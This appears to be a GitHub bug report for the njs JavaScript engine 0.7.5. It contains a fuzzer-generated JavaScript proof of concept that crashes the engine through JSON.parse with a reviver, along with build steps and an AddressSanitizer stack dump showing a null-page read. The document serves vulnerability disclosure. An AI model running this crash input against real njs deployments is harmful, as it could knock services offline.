You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Commit : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build :
./configure --cc=clang --address-sanitizer=YES
make
Proof of concept
function placeholder(){}
function main() {
async function v1(v2,v3) {
var v4 = await Map;
}
var v5 = {};
var v11 = `
var v12 = Object(-9007199254740993,-4027512271n);
`;
var v17 = `
var v18 = (-256n)(-9007199254740993,-4027512271n);
`;
var v28 = `
Object[-4027512271] **= -4027512271n;
var v30 = Object(-9007199254740993,...-65536n);
`;
var v34 = `
var v35 = Object(-9007199254740993,-4027512271n);
`;
var v38 = `
var v39 = Object(-9007199254740993,-9007199254740993n);
`;
var v43 = `
var v44 = undefined(-1290018985n,-4027512271n);
`;
var v50 = [-1000000.0,-1000000.0,-1000000.0];
var v58 = `
var v59 = (-1.7976931348623157e+308)(8980,-4027512271n);
`;
var v60 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v61 = Object(0n,-4027512271n);
`;
function v67(v68) {
v68[1866532165] = Map;
}
function v69(v70,v71) {
var v78 = new Uint8ClampedArray();
var v81 = {};
var v82 = /gL8?/;
var v83 = {};
var v84 = [v81,v83,v82];
function v86(v87) {
v84[1866532165] = Map;
}
async function v90(v91,v92) {
var v93 = await Map;
}
function v94(v95,v96) {
}
var v98 = new Promise(v94);
var v100 = v98["catch"]();
var v103 = {"get":Promise,"set":v90};
var v104 = Object.defineProperty(v100,"constructor",v103);
async function v105(v106,v107) {
var v108 = await v104;
}
var v109 = v105();
var v110 = v86(Map);
var v111 = String();
var v122 = `
var v123 = Object(-9007199254740993,-4027512271n);
`;
var v124 = `
(-4027512271n)[-4027512271] **= -4027512271n;
`;
var v130 = `
var v132 = [-4027512271n,Object,-4027512271n,1,v78,-4027512271n,Object,Uint8ClampedArray,8980,Object];
var v133 = Object();
v133[-4027512271] **= -4027512271n;
`;
var v140 = `
var v141 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
`;
var v148 = `
var v149 = Object(-9007199254740993,-4027512271n,15034n);
`;
var v152 = `
var v153 = Object(-4294967296,-4027512271n);
`;
var v161 = `
var v162 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v172 = `
Object[-4027512271] **= -4027512271n;
var v174 = Object(-9007199254740993,-4027512271n);
`;
var v176 = `
var v177 = Object(-9007199254740993,-9007199254740993n);
`;
var v181 = `
var v182 = undefined(-4027512271n,-4027512271n);
`;
var v187 = `
var v188 = "bigint"();
v188[-4027512271] **= -4027512271n;
var v189 = Object(-4027512271n,-4027512271n);
`;
var v190 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v191 = Object(-9007199254740993,-4027512271n);
`;
var v195 = `
var v196 = ReferenceError(-4027512271n,-4027512271n);
`;
var v199 = Float64Array();
var v204 = `
v199[-4027512271] **= -4027512271n;
var v205 = Object(-9007199254740993,-4027512271n);
`;
var v206 = `
var v207 = Object(-4027512271n,-4027512271n);
`;
var v211 = `
var v212 = (-1070059123)(-9007199254740993,-4027512271n);
`;
var v213 = `
var v214 = ArrayBuffer(-4027512271n,-9007199254740993n);
`;
var v220 = `
var v221 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
`;
var v226 = `
var v227 = (-4027512271n)();
var v228 = v227(0n,-4027512271n);
`;
var v232 = `
var v234 = Object();
v234[-1316174388] >>= -4027512271n;
var v236 = Object["getPrototypeOf"](v111,-4027512271n);
var v237 = Object(-4027512271n,-4027512271n);
`;
var v238 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v239 = Symbol(-9007199254740993,-4027512271n);
`;
Promise[-4294967297] = Map;
}
var v241 = new Promise(v69);
var v249 = Object();
var v250 = `
var v251 = Object(-9007199254740993,-4027512271n);
`;
var v252 = `
var v253 = v252();
v253[-4027512271] **= -4027512271n;
var v254 = Object(v249,-4027512271n);
`;
var v255 = `
Object[-4027512271] **= -4027512271n;
var v257 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v261 = `
var v262 = (-4027512271n)(-9007199254740993,-2147483649n);
`;
var v265 = `
var v266 = (-4027512271n)(v50,-4027512271n);
`;
var v272 = `
var v273 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
`;
var v277 = `
var v278 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v279 = `
var v281 = Object();
v281[-4027512271] **= -767560483n;
var v282 = Object(-4027512271n,-3242169687n);
`;
var v283 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v284 = Object(-9007199254740993,-4027512271n);
`;
var v288 = `
var v289 = (-9007199254740993)();
v289[-4027512271] **= -4027512271n;
var v290 = v289(0n,-4027512271n);
`;
var v291 = [v5,v5,v5,v5,v5];
var v292 = {};
var v293 = [v292,v292,v291];
var v295 = new Int16Array();
var v296 = {};
var v297 = [v293,v296];
var v298 = {};
var v299 = [v295,v297,v298];
var v301 = [2332289465,v298,2332289465,2332289465];
var v303 = typeof Map;
async function v305(v306,v307) {
var v308 = await Map;
}
var v310 = JSON.stringify(v299);
var v313 = Math.cbrt();
async function v314(v315,v316,v317) {
}
switch (Math) {
case v313:
break;
case 2332289465:
case 2332289465:
break;
case Math:
async function v320(v321,v322) {
var v323 = await Map;
}
var v324 = JSON.parse(v310,v314);
break;
case Map:
case v299:
break;
case v301:
break;
case -9007199254740993:
}
}
main();
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==8300==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000342 (pc 0x000000573313 bp 0x7ffe8d0e1110 sp 0x7ffe8d0e1060 T0)
==8300==The signal is caused by a READ memory access.
==8300==Hint: address points to the zero page.
#0 0x573313 in njs_function_lambda_frame /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:443:13
#1 0x573802 in njs_function_frame /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:153:16
#2 0x573802 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:587:11
#3 0x56e6b2 in njs_function_apply /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:186:12
#4 0x56e6b2 in njs_json_internalize_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_json.c:937:11
#5 0x56e536 in njs_json_internalize_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_json.c:912:23
#6 0x567dea in njs_json_parse /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_json.c:152:16
#7 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
#8 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
#9 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
#10 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
#11 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
#12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
#13 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
#14 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
#15 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
#16 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
#17 0x7f72273c8082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
#18 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:443:13 in njs_function_lambda_frame
==8300==ABORTING
Environment
Proof of concept
Stack dump
Credit
dramthy(@topsec alpha)
The text was updated successfully, but these errors were encountered: